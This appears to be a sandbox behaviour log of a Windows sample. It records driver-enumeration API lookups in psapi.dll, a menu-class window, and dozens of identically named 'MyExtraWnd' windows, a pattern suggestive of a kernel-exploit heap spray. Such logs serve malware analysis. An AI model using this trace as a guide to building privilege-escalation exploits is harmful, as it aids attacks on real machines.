Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x758914cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x75891514 True 1
Fn
Thread 0xa50
255 0
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
